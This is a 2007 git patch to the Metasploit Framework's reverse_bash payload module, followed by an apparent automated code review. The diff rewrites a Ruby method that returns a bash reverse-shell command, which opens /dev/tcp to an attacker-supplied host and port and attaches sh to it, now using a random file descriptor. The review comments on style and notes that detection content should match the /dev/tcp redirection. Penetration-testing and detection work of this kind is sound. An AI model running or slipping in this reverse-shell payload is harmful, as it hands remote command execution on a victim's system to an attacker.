From ce01a25e0cc0315205e0b1bfd62422892eb45dc8 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sat, 17 Feb 2007 23:41:22 +0000
Subject: [PATCH] This patch fixes #4. Pick a random file descriptor and make sure its closed before we use it
git-svn-id: file:///home/svn/framework3/trunk@4407 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/payloads/singles/cmd/unix/reverse_bash.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb
index 9a90b801dd..afba4db41d 100644
--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -1,5 +1,5 @@
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp_double'
+require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 module Msf
@@ -21,7 +21,7 @@ module ReverseBash
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
- 'Handler' => Msf::Handler::ReverseTcpDouble,
+ 'Handler' => Msf::Handler::ReverseTcp,
 'Session' => Msf::Sessions::CommandShell,
 'PayloadType' => 'cmd_bash',
 'Payload' =>
@@ -43,7 +43,8 @@ module ReverseBash
 # Returns the command string to use for execution
 #
 def command_string
- return "exec 13<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&13 >&13";
+ fd = rand(200) + 20
+ return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}";
 end
 end
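Review bot: The new `fd = rand(200) + 20` line in command_string (third hunk) uses two unexplained literals, and nothing in the code says why the descriptor is randomised or what the leading `0<&#{fd}-` is for; only the commit message does. I would add a comment above it such as `# Use a random descriptor in 20..219 and release it before use, so we never reuse one that is already open (fixes #4)`, and give the two bounds names as constants. Because the returned string now differs on every call, tests and detection content that matched the old fixed `exec 13<>` text will no longer match and should key on the `/dev/tcp/` redirection rather than the descriptor number. The explicit `return` and trailing `;` are also unnecessary in Ruby. command_string is fully visible here, but the enclosing module begins outside the hunk.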